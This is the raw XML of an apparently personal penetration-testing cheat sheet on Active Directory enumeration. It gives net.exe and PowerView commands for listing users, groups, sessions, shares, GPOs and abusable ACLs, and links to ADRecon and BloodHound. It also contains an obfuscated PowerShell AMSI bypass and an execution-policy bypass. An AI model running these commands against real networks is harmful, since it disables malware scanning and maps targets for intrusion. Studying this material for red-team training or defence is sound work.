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Traditional Approach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Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>net.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Open CMD or powershell, enter commands:-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net user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Enumerate all users in the local domain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net user /domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Adding the /domain flag will enumerate all users in the entire domain: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net user &lt;username&gt; /domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Detailed query information about individual users.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net group /domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Enumerate all groups in the domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Output will give custom groups like Secret_Group, Nested_Group and Another_Nested_Group. In Active Directory, a group (and subsequently all the included members) can be added as member to another group. This is known as a nested group.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Unfortunately, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>net.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command line tool cannot list nested groups and only shows the direct user members.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whoami /groups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</w:pPr>
      <w:r>
        <w:t>Currently Logged on Users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NetWkstaUserEnum API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requires administrative permissions and returns the list of all users logged on to a target workstation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NetSessionEnum API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used from a regular domain user and returns a list of active user sessions on servers such as fileservers or domain controllers.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PowerView</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> script will be for above API . Get-NetLoggedon and Get-NetSession functions, which invoke NetWkstaUserEnum and NetSessionEnum respectively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Import module to powershell :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>PS C:\Tools\active_directory&gt; Import-Module .\PowerView.ps1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PS C:\Tools\active_directory&gt; Get-NetLoggedon -ComputerName client251 ,where client251 is the target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PS C:\Tools\active_directory&gt; Get-NetSession -ComputerName dc01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pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>ADRecon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>ADRecon.ps1 -OutputDir &lt;folder&gt; -OutputType HTML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Github:-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/sense-of-security/ADRecon" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>https://github.com/sense-of-security/ADRecon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"https://medium.com/@tristan_45472/getting-started-with-bloodhound-911ca94bd552"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https://medium.com/@tristan_45472/getting-started-with-bloodhound-911ca94bd552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"https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors"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https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors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Bypass AMSI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Antimalware Scan Interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>any:-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powershell -ep bypass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SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "notion://www.notion.so/"{1}{0}"-F'F','rE'" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>TYpE</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:r>
        <w:t>Embly"."GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>TY</w:t>
      </w:r>
      <w:r>
        <w:t>Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>etf</w:t>
      </w:r>
      <w:r>
        <w:t>iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>VaLUE"( ${n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>ULl},${t</w:t>
      </w:r>
      <w:r>
        <w:t>RuE} )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Domain User Enum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Get a list of users in the current domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-DomainUser Get-DomainUser -Name student1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#Find User Accounts used as Service Accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-DomainUser -SPN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#Get list of all properties for users in the current domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-DomainUser –Properties lastlogon Get-DomainUser –Properties description, Get-DomainUser -Properties samaccountname,memberof</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>all enabled users, returning distinguishednames</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname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#all disabled users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Get-DomainUser -UACFilter ACCOUNTDISABLE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#QUICK WIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-DomainUser –Properties description</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Domain Group Enum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#Get all the groups in the current domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-DomainGroup Get-DomainGroupMember -Name "Domain Admins"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#Get all the members of the Domain Admins group</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-NetGroupMember -GroupName "Domain Admins" Get-NetGroupMember -GroupName "Domain Admins" -Recurse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#Get all domains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-Domain Get-DomainOU Get-NetGroupMember -GroupName "Enterprise Admins" -Domain &lt;domain name here&gt;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#Get the group membership for a user:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-DomainGroup –UserName "student1"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Domain Computer and Server Enum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>enumerates computers and derver in the current domain with 'outlier' properties, i.e. properties not set from the forest result returned by Get-DomainComputer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier Get-DomainComputer Get-DomainComputer –OperatingSystem "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>Server 2016</w:t>
      </w:r>
      <w:r>
        <w:t>" Get-DomainComputer -Ping Get-DomainComputer -Name "Student.pentesting.local"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>GPO and OU Enum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>A Group Policy Object (GPO) is a virtual collection of policy settings. A GPO has a unique name, such as a GUID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Get-DomainGPO Get-DomainGPO | Select displayname Get-DomainGPO -ComputerName student.pentesting.local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#Get machines where the given user is member of a specific group</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-DomainGPOUserLocalGroupMapping -UserName student1 -Verbose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#Domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-domain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  <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>enumerate all gobal catalogs in the forest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Get-ForestGlobalCatalog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#Get OUs in a domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-DomainOU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#Get GPO for specific name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-DomainGPO Get-DomainGPO -Name "{AB306569-220D-43FF-B03B83E8F4EF8081}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Domain Shares Enum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#Find shares on hosts in current domain.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Find-DomainShare –Verbose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#Find Non Standard Shares</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Find-DomainShare –Verbose -ExcludeStandard -ExcludeIPC -ExcludePrint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#Find sensitive files on computers in the domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Invoke-FileFinder –Verbose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#Get all fileservers of the domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-DomainFileServer -Verbose</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>ACL Enum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Access Control List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#Get the ACLs associated with the specified object</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-ObjectAcl -SamAccountName student1 –ResolveGUIDs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#GenericWrite for all users &gt; under advanced &gt; Write all properties</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get-ObjectAcl -SamAccountName * –ResolveGUIDs | ? { ($</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>.ActiveDirectoryRights -match 'GenericWrite') -and ($</w:t>
      </w:r>
      <w:r>
        <w:t>.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603') }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Get ACLS with Invoke Scanner(scans the domain for all interesting abusable permissions)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Invoke-ACLScanner -ResolveGUIDs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9"/>
        </w:rPr>
        <w:t>Refrerence :-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://medium.com/r3d-buck3t/enumerating-access-controls-in-active-directory-c06e2efa8b89" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>https://medium.com/r3d-buck3t/enumerating-access-controls-in-active-directory-c06e2efa8b89</w:t>
      </w:r>
      <w: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E7A93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A42E7A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A3592E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA3592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46139F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B46139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5B8E7BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5B8E7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36EDACA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E36EDA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C08BD30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC08BD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0915901"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="609159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454D4CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6454D4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DE0927A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6DE092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C469F"/>
    <w:rsid w:val="0E5F6521"/>
    <w:rsid w:val="183C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2023-05-31T04:06:00Z</dcterms:created>
  <dc:creator>WPS_1665655857</dc:creator>
  <cp:lastModifiedBy>WPS_1665655857</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-31T04:10:40Z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